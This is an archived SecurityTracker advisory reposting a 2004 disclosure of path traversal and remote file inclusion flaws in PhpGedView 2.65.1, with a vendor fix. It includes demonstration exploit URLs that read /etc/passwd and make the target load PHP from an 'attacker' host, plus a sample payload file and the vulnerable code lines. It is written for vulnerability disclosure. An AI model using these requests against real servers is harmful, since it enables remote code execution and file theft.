SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PhpGedView Vendors:   phpgedview.sourceforge.net
PhpGedView Include File Holes in 'conf' Files Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1008892
SecurityTracker URL:  http://securitytracker.com/id/1008892
CVE Reference:   CVE-2004-0127, CVE-2004-0128   (Links to External Site)
Updated:  Feb 4 2004
Original Entry Date:  Jan 30 2004
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.65.1 and prior versions
Description:   Cedric Cochin of netVigilance reported several include file vulnerabilities in PhpGedView. A remote user can execute arbitrary PHP code and operating system commands on the target system. A remote authenticated user with 'admin' privileges can view files on the target system.

It is reported that the several scripts (those ending in '_conf.php') do not properly validate user-supplied input in the $PGV_BASE_DIRECTORY variable. A remote user can supply a specially crafted URL to cause remote PHP code, including operating system commands, to be included by and executed on the target system with the privileges of the target web service [CVE: CVE-2004-0128].

A demonstration exploit URL is provided that will cause the '[GED_File]_conf.php' script located at the 'attacker' site to be included and executed on the target system:

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/

The system is only affected when PHP register_globals is On, the report said.

It is also reported that a remote authenticated user with 'admin' privileges can view arbitrary files on the system with the privileges of the web service due to an input validation flaw in the 'gedcom_config' parameter of the 'editconfig_gedcom.php' script [CVE: CVE-2004-0127].

A demonstration exploit URL is provided:

http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote authenticated user with 'admin' privileges can view arbitrary files on the target system with the privileges of the target web service.

Solution:   The vendor has released a fixed version (2.65.2), available at:

http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517

Vendor URL:  phpgedview.sourceforge.net/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


        PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

################################################################################
Summary :

phpGedView is an open source system for online viewing Gedcom information
(family tree and genology information).  Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product.  They enable a malicious user
to access arbitrary files or execute commands on the server.

################################################################################
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* phpGedView version 2.65.1 and prior

Release Date :
January 30, 2004

Severity :
HIGH

################################################################################
Examples :

		  -------------------------------------------

I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd

- -- HTTP Request --

Code impacted : editconfig_gedcom.php

61:if (empty($gedcom_config)) {
62:        if (!empty($_POST["gedcom_config"])) $gedcom_config = $_POST["gedcom_config"];
63:	else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);

The both GET/POST requets will work evenif PHP register_globals is Off.

		  -------------------------------------------

II - PHP Injection
(HIGH Risk no authentication needed)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/

- -- HTTP Request --

Code impacted : [GED_File]_conf.php

123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) 
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125:        $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126:	    require($THEME_DIR."theme.php");
127:     }

The require call is only vulnerable when PHP register_globals is On.

In this case you have to obtain the name of the GEDCOM File used.  Just perform
a http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.

The attacker has to create on his web site a directory call themes/standard, and
a file theme.php

For example: theme.php = <?php print "<?php phpinfo();?>" ;?>

and the request, will execute the phpinfo() command on the vulnerable target.


################################################################################
Vendor Status :

The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- --> 
http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco@netvigilance.com >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAGZbZA9/8vqmWoYQRAmVrAJ9rd9L6WkO5FV9ufaMYj5mhk0uMXwCePwxS
+hdjG8/IGk+yoZje7W1I110=
=Gfdz
-----END PGP SIGNATURE-----


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC